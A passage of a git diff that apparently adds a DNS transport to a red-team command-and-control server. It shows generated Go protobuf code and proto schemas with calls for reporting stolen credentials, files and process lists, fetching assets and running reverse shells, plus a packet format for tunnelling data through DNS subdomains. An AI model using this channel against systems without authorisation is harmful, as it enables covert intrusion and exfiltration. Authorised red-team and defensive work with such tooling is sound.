0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, - 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x4d, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, - 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, - 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, - 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, - 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, - 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, - 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, - 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x0c, - 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x17, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, - 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, - 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, - 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, - 0x6f, 0x33, -}) +const file_c2_proto_rawDesc = "" + + "\n" + + "\bc2.proto\x12\x02c2\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x0eeldritch.proto\"'\n" + + "\x05Agent\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\"\xb9\x02\n" + + "\x06Beacon\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x1c\n" + + "\tprincipal\x18\x02 \x01(\tR\tprincipal\x12\x1c\n" + + "\x04host\x18\x03 \x01(\v2\b.c2.HostR\x04host\x12\x1f\n" + + "\x05agent\x18\x04 \x01(\v2\t.c2.AgentR\x05agent\x12\x1a\n" + + "\binterval\x18\x05 \x01(\x04R\binterval\x122\n" + + "\ttransport\x18\x06 \x01(\x0e2\x14.c2.Beacon.TransportR\ttransport\"b\n" + + "\tTransport\x12\x19\n" + + "\x15TRANSPORT_UNSPECIFIED\x10\x00\x12\x12\n" + + "\x0eTRANSPORT_GRPC\x10\x01\x12\x13\n" + + "\x0fTRANSPORT_HTTP1\x10\x02\x12\x11\n" + + "\rTRANSPORT_DNS\x10\x03\"\xfe\x01\n" + + "\x04Host\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x12\n" + + "\x04name\x18\x02 \x01(\tR\x04name\x12-\n" + + "\bplatform\x18\x03 \x01(\x0e2\x11.c2.Host.PlatformR\bplatform\x12\x1d\n" + + "\n" + + "primary_ip\x18\x04 \x01(\tR\tprimaryIp\"t\n" + + "\bPlatform\x12\x18\n" + + "\x14PLATFORM_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PLATFORM_WINDOWS\x10\x01\x12\x12\n" + + "\x0ePLATFORM_LINUX\x10\x02\x12\x12\n" + + "\x0ePLATFORM_MACOS\x10\x03\x12\x10\n" + + "\fPLATFORM_BSD\x10\x04\"Y\n" + + "\x04Task\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\"\n" + + "\x04tome\x18\x02 \x01(\v2\x0e.eldritch.TomeR\x04tome\x12\x1d\n" + + "\n" + + "quest_name\x18\x03 \x01(\tR\tquestName\"\x1d\n" + + "\tTaskError\x12\x10\n" + + "\x03msg\x18\x01 \x01(\tR\x03msg\"\xe3\x01\n" + + "\n" + + "TaskOutput\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + + "\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + + "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + + "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + + "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"7\n" + + "\x11ClaimTasksRequest\x12\"\n" + + "\x06beacon\x18\x01 \x01(\v2\n" + + ".c2.BeaconR\x06beacon\"4\n" + + "\x12ClaimTasksResponse\x12\x1e\n" + + "\x05tasks\x18\x01 \x03(\v2\b.c2.TaskR\x05tasks\"'\n" + + "\x11FetchAssetRequest\x12\x12\n" + + "\x04name\x18\x01 \x01(\tR\x04name\"*\n" + + "\x12FetchAssetResponse\x12\x14\n" + + "\x05chunk\x18\x01 \x01(\fR\x05chunk\"h\n" + + "\x17ReportCredentialRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x124\n" + + "\n" + + "credential\x18\x02 \x01(\v2\x14.eldritch.CredentialR\n" + + "credential\"\x1a\n" + + "\x18ReportCredentialResponse\"R\n" + + "\x11ReportFileRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12$\n" + + "\x05chunk\x18\x02 \x01(\v2\x0e.eldritch.FileR\x05chunk\"\x14\n" + + "\x12ReportFileResponse\"^\n" + + "\x18ReportProcessListRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12)\n" + + "\x04list\x18\x02 \x01(\v2\x15.eldritch.ProcessListR\x04list\"\x1b\n" + + "\x19ReportProcessListResponse\"A\n" + + "\x17ReportTaskOutputRequest\x12&\n" + + "\x06output\x18\x01 \x01(\v2\x0e.c2.TaskOutputR\x06output\"\x1a\n" + + "\x18ReportTaskOutputResponse\"s\n" + + "\x13ReverseShellRequest\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data\x12\x17\n" + + "\atask_id\x18\x03 \x01(\x03R\x06taskId\"[\n" + + "\x14ReverseShellResponse\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data*\x8f\x01\n" + + "\x17ReverseShellMessageKind\x12*\n" + + "&REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED\x10\x00\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_DATA\x10\x01\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_PING\x10\x022\xfc\x03\n" + + "\x02C2\x12=\n" + + "\n" + + "ClaimTasks\x12\x15.c2.ClaimTasksRequest\x1a\x16.c2.ClaimTasksResponse\"\x00\x12=\n" + + "\n" + + "FetchAsset\x12\x15.c2.FetchAssetRequest\x1a\x16.c2.FetchAssetResponse0\x01\x12M\n" + + "\x10ReportCredential\x12\x1b.c2.ReportCredentialRequest\x1a\x1c.c2.ReportCredentialResponse\x12=\n" + + "\n" + + "ReportFile\x12\x15.c2.ReportFileRequest\x1a\x16.c2.ReportFileResponse(\x01\x12P\n" + + "\x11ReportProcessList\x12\x1c.c2.ReportProcessListRequest\x1a\x1d.c2.ReportProcessListResponse\x12O\n" + + "\x10ReportTaskOutput\x12\x1b.c2.ReportTaskOutputRequest\x1a\x1c.c2.ReportTaskOutputResponse\"\x00\x12G\n" + + "\fReverseShell\x12\x17.c2.ReverseShellRequest\x1a\x18.c2.ReverseShellResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/internal/c2/c2pbb\x06proto3" var ( file_c2_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go new file mode 100644 index 000000000..83c2ff9b3 --- /dev/null +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -0,0 +1,510 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. +// versions: +// protoc-gen-go v1.36.11 +// protoc v6.32.0 +// source: dns.proto + +package dnspb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" + unsafe "unsafe" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) +) + +// PacketType defines the type of DNS packet in the conversation +type PacketType int32 + +const ( + PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0 + PacketType_PACKET_TYPE_INIT PacketType = 1 // Establish conversation + PacketType_PACKET_TYPE_DATA PacketType = 2 // Send data chunk + PacketType_PACKET_TYPE_FETCH PacketType = 3 // Retrieve response chunk + PacketType_PACKET_TYPE_STATUS PacketType = 4 // Server status response with ACKs/NACKs +) + +// Enum value maps for PacketType. +var ( + PacketType_name = map[int32]string{ + 0: "PACKET_TYPE_UNSPECIFIED", + 1: "PACKET_TYPE_INIT", + 2: "PACKET_TYPE_DATA", + 3: "PACKET_TYPE_FETCH", + 4: "PACKET_TYPE_STATUS", + } + PacketType_value = map[string]int32{ + "PACKET_TYPE_UNSPECIFIED": 0, + "PACKET_TYPE_INIT": 1, + "PACKET_TYPE_DATA": 2, + "PACKET_TYPE_FETCH": 3, + "PACKET_TYPE_STATUS": 4, + } +) + +func (x PacketType) Enum() *PacketType { + p := new(PacketType) + *p = x + return p +} + +func (x PacketType) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (PacketType) Descriptor() protoreflect.EnumDescriptor { + return file_dns_proto_enumTypes[0].Descriptor() +} + +func (PacketType) Type() protoreflect.EnumType { + return &file_dns_proto_enumTypes[0] +} + +func (x PacketType) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use PacketType.Descriptor instead. +func (PacketType) EnumDescriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +type DNSPacket struct { + state protoimpl.MessageState `protogen:"open.v1"` + Type PacketType `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type + Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-Based for INIT, 1-based for DATA) + ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 8-character random conversation ID + Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) + Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation + // Async protocol fields for windowed transmission + WindowSize uint32 `protobuf:"varint,6,opt,name=window_size,json=windowSize,proto3" json:"window_size,omitempty"` // Number of packets client has in-flight + Acks []*AckRange `protobuf:"bytes,7,rep,name=acks,proto3" json:"acks,omitempty"` // Ranges of successfully received chunks (SACK) + Nacks []uint32 `protobuf:"varint,8,rep,packed,name=nacks,proto3" json:"nacks,omitempty"` // Specific sequence numbers to retransmit + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *DNSPacket) Reset() { + *x = DNSPacket{} + mi := &file_dns_proto_msgTypes[0] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *DNSPacket) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*DNSPacket) ProtoMessage() {} + +func (x *DNSPacket) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[0] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use DNSPacket.ProtoReflect.Descriptor instead. +func (*DNSPacket) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +func (x *DNSPacket) GetType() PacketType { + if x != nil { + return x.Type + } + return PacketType_PACKET_TYPE_UNSPECIFIED +} + +func (x *DNSPacket) GetSequence() uint32 { + if x != nil { + return x.Sequence + } + return 0 +} + +func (x *DNSPacket) GetConversationId() string { + if x != nil { + return x.ConversationId + } + return "" +} + +func (x *DNSPacket) GetData() []byte { + if x != nil { + return x.Data + } + return nil +} + +func (x *DNSPacket) GetCrc32() uint32 { + if x != nil { + return x.Crc32 + } + return 0 +} + +func (x *DNSPacket) GetWindowSize() uint32 { + if x != nil { + return x.WindowSize + } + return 0 +} + +func (x *DNSPacket) GetAcks() []*AckRange { + if x != nil { + return x.Acks + } + return nil +} + +func (x *DNSPacket) GetNacks() []uint32 { + if x != nil { + return x.Nacks + } + return nil +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +type AckRange struct { + state protoimpl.MessageState `protogen:"open.v1"` + StartSeq uint32 `protobuf:"varint,1,opt,name=start_seq,json=startSeq,proto3" json:"start_seq,omitempty"` // Inclusive start of range + EndSeq uint32 `protobuf:"varint,2,opt,name=end_seq,json=endSeq,proto3" json:"end_seq,omitempty"` // Inclusive end of range + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *AckRange) Reset() { + *x = AckRange{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *AckRange) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*AckRange) ProtoMessage() {} + +func (x *AckRange) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use AckRange.ProtoReflect.Descriptor instead. +func (*AckRange) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *AckRange) GetStartSeq() uint32 { + if x != nil { + return x.StartSeq + } + return 0 +} + +func (x *AckRange) GetEndSeq() uint32 { + if x != nil { + return x.EndSeq + } + return 0 +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +type InitPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") + TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect + DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + FileSize uint32 `protobuf:"varint,4,opt,name=file_size,json=fileSize,proto3" json:"file_size,omitempty"` // Total size of the file/data in bytes + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *InitPayload) Reset() { + *x = InitPayload{} + mi := &file_dns_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *InitPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*InitPayload) ProtoMessage() {} + +func (x *InitPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[2] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use InitPayload.ProtoReflect.Descriptor instead. +func (*InitPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{2} +} + +func (x *InitPayload) GetMethodCode() string { + if x != nil { + return x.MethodCode + } + return "" +} + +func (x *InitPayload) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *InitPayload) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *InitPayload) GetFileSize() uint32 { + if x != nil { + return x.FileSize + } + return 0 +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +type FetchPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (1-based) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *FetchPayload) Reset() { + *x = FetchPayload{} + mi := &file_dns_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *FetchPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*FetchPayload) ProtoMessage() {} + +func (x *FetchPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[3] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. +func (*FetchPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{3} +} + +func (x *FetchPayload) GetChunkIndex() uint32 { + if x != nil { + return x.ChunkIndex + } + return 0 +} + +// ResponseMetadata indicates the response is chunked and must be fetched +type ResponseMetadata struct { + state protoimpl.MessageState `protogen:"open.v1"` + TotalChunks uint32 `protobuf:"varint,1,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of response chunks + DataCrc32 uint32 `protobuf:"varint,2,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete response data + ChunkSize uint32 `protobuf:"varint,3,opt,name=chunk_size,json=chunkSize,proto3" json:"chunk_size,omitempty"` // Size of each chunk (last may be smaller) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ResponseMetadata) Reset() { + *x = ResponseMetadata{} + mi := &file_dns_proto_msgTypes[4] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ResponseMetadata) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ResponseMetadata) ProtoMessage() {} + +func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[4] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. +func (*ResponseMetadata) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{4} +} + +func (x *ResponseMetadata) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *ResponseMetadata) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *ResponseMetadata) GetChunkSize() uint32 { + if x != nil { + return x.ChunkSize + } + return 0 +} + +var File_dns_proto protoreflect.FileDescriptor + +const file_dns_proto_rawDesc = "" + + "\n" + + "\tdns.proto\x12\x03dns\"\xf9\x01\n" + + "\tDNSPacket\x12#\n" + + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\x12\x1f\n" + + "\vwindow_size\x18\x06 \x01(\rR\n" + + "windowSize\x12!\n" + + "\x04acks\x18\a \x03(\v2\r.dns.AckRangeR\x04acks\x12\x14\n" + + "\x05nacks\x18\b \x03(\rR\x05nacks\"@\n" + + "\bAckRange\x12\x1b\n" + + "\tstart_seq\x18\x01 \x01(\rR\bstartSeq\x12\x17\n" + + "\aend_seq\x18\x02 \x01(\rR\x06endSeq\"\x8d\x01\n" + + "\vInitPayload\x12\x1f\n" + + "\vmethod_code\x18\x01 \x01(\tR\n" + + "methodCode\x12!\n" + + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\x12\x1b\n" + + "\tfile_size\x18\x04 \x01(\rR\bfileSize\"/\n" + + "\fFetchPayload\x12\x1f\n" + + "\vchunk_index\x18\x01 \x01(\rR\n" + + "chunkIndex\"s\n" + + "\x10ResponseMetadata\x12!\n" + + "\ftotal_chunks\x18\x01 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + + "\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x84\x01\n" + + "\n" + + "PacketType\x12\x1b\n" + + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + + "\x10PACKET_TYPE_DATA\x10\x02\x12\x15\n" + + "\x11PACKET_TYPE_FETCH\x10\x03\x12\x16\n" + + "\x12PACKET_TYPE_STATUS\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + +var ( + file_dns_proto_rawDescOnce sync.Once + file_dns_proto_rawDescData []byte +) + +func file_dns_proto_rawDescGZIP() []byte { + file_dns_proto_rawDescOnce.Do(func() { + file_dns_proto_rawDescData = protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc))) + }) + return file_dns_proto_rawDescData +} + +var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 5) +var file_dns_proto_goTypes = []any{ + (PacketType)(0), // 0: dns.PacketType + (*DNSPacket)(nil), // 1: dns.DNSPacket + (*AckRange)(nil), // 2: dns.AckRange + (*InitPayload)(nil), // 3: dns.InitPayload + (*FetchPayload)(nil), // 4: dns.FetchPayload + (*ResponseMetadata)(nil), // 5: dns.ResponseMetadata +} +var file_dns_proto_depIdxs = []int32{ + 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType + 2, // 1: dns.DNSPacket.acks:type_name -> dns.AckRange + 2, // [2:2] is the sub-list for method output_type + 2, // [2:2] is the sub-list for method input_type + 2, // [2:2] is the sub-list for extension type_name + 2, // [2:2] is the sub-list for extension extendee + 0, // [0:2] is the sub-list for field type_name +} + +func init() { file_dns_proto_init() } +func file_dns_proto_init() { + if File_dns_proto != nil { + return + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), + NumEnums: 1, + NumMessages: 5, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_dns_proto_goTypes, + DependencyIndexes: file_dns_proto_depIdxs, + EnumInfos: file_dns_proto_enumTypes, + MessageInfos: file_dns_proto_msgTypes, + }.Build() + File_dns_proto = out.File + file_dns_proto_goTypes = nil + file_dns_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index d8238b97c..31f03d2b5 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -2,3 +2,4 @@ package c2 //go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto //go:generate protoc -I=./proto --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./dnspb --go_opt=paths=source_relative dns.proto diff --git a/tavern/internal/c2/proto/c2.proto b/tavern/internal/c2/proto/c2.proto index 8fc5cf5b3..8ef213c85 100644 --- a/tavern/internal/c2/proto/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -29,6 +29,7 @@ message Beacon { TRANSPORT_UNSPECIFIED = 0; TRANSPORT_GRPC = 1; TRANSPORT_HTTP1 = 2; + TRANSPORT_DNS = 3; } Transport transport = 6; diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto new file mode 100644 index 000000000..308b87254 --- /dev/null +++ b/tavern/internal/c2/proto/dns.proto @@ -0,0 +1,57 @@ +syntax = "proto3"; + +package dns; + +option go_package = "realm.pub/tavern/internal/c2/dnspb"; + +// PacketType defines the type of DNS packet in the conversation +enum PacketType { + PACKET_TYPE_UNSPECIFIED = 0; + PACKET_TYPE_INIT = 1; // Establish conversation + PACKET_TYPE_DATA = 2; // Send data chunk + PACKET_TYPE_FETCH = 3; // Retrieve response chunk + PACKET_TYPE_STATUS = 4; // Server status response with ACKs/NACKs +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +message DNSPacket { + PacketType type = 1; // Packet type + uint32 sequence = 2; // Chunk sequence number (0-Based for INIT, 1-based for DATA) + string conversation_id = 3; // 8-character random conversation ID + bytes data = 4; // Chunk payload (or InitPayload for INIT packets) + uint32 crc32 = 5; // Optional CRC32 for validation + + // Async protocol fields for windowed transmission + uint32 window_size = 6; // Number of packets client has in-flight + repeated AckRange acks = 7; // Ranges of successfully received chunks (SACK) + repeated uint32 nacks = 8; // Specific sequence numbers to retransmit +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +message AckRange { + uint32 start_seq = 1; // Inclusive start of range + uint32 end_seq = 2; // Inclusive end of range +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +message InitPayload { + string method_code = 1; // 2-character gRPC 